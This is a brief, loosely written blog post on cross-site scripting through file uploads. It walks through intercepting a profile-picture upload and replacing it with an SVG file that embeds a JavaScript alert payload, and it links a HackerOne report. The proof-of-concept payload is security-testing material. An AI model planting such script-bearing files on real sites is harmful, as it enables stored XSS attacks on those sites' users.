I'll be talking about file upload vulnerabilities in this blog..
Most applications provide a function for uploading files. On the other hand, this feature is implemented in a variety of ways depending on the use case of the application. While some programmes simply let the uploading of a profile photo and only enable image-related extensions, others, depending on their business case, accept other extensions.
XSS Via File Upload:-
There are several ways to carry
out a cross-site scripting attack scenario while testing the file upload
capability.
A major chance to discover
cross-site scripting (XSS) in a web application is during a file upload.
These are a few techniques for
XSS via file upload.
2. XSS via Metadata
3. XSS via SVG file
4. SVG-based blind XSS
Now let's Start about this blog
Now I have Website www.Example.com, Here We have option User can Upload any File On profile Picture Section .
Add Normal Picture add in profile, Capture the Request and Change mata data To Original To SVG code
HERE'S THE SVG CODE:-
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("Maxx IS here");
</script>
</svg>
Now The Code Has Been Executed
THE POPUP IS HERE💣💥
Further Reads:
https://hackerone.com/reports/880099
Happy hacking!
everyone have fun learning!
0 Comments